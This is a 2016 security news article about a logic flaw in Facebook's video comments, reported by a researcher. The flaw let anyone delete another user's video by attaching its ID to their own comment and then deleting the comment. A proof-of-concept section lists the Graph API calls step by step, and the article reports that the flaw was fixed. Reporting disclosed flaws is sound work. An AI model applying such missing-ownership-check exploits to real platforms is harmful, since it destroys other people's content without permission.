Facebook’s Bug – Hackers Can Delete Any Video From Facebook Comments

By | June 25, 2016

Facebook Critical Flaw

Indian security researcher, Pranav Hivarekar reported critical security flaw on Facebook’s new video comment feature. Using this flaw Hivarekar  was able to delete any video of his choice by abusing this logic flaw.

He reported the flaw to Facebook and they immediately fixed the flaw.

Facebook recently launched it’s new feature, now users can post a video in comment fields for eg. Now, users were allowed to upload a video in comments.

When a Facebook user uploads any video as a comment, the video is uploaded onto his Facebook timeline and is given a video ID. This video is then attached to the desired Facebook post based on that video ID.

After playing around with some Facebook API (Application Program Interface) requests, Hivarekar was able to delete any video uploaded as a comment on the platform, based on its video ID.

Proof Of Concept

1.Create a comment on a post via API.

Api call :
Reference: (https://developers.facebook.com/docs/graph-api/reference/object/comments/)

POST /< post id>/comments?message=test

2.Edit the comment and attach a VIDEO of your choice via API.

Video id : 1739331926310614 (Video to be deleted)

Api call :
Reference: (https://developers.facebook.com/docs/graph-api/reference/v2.6/comment)

POST /< comment id>?attachment_id=1739331926310614

Video added as a comment.

3.Delete the comment. Wait 20 secs. (As it takes 20 secs to DELETE the video from Facebook’s server.)

Api call :
Reference: (https://developers.facebook.com/docs/graph-api/reference/v2.6/comment)

DELETE /< comment id>

This will delete the video.

This vulnerability was temporarily fixed by Facebook team in 23 minutes after confirmation of flaw.

Permanent fix was live in 10-12 hrs after that.

Kudos to Facebook. 🙂

According to Hivarekar, This bug is proof of flaw in logic rather than daily technical flaws which we see like RCE, SSRF. Facebook forgot to add permission checks to verify if the user deleting a particular comment was the owner of that comment and the owner of the attached video.

Subscribe for latest security updates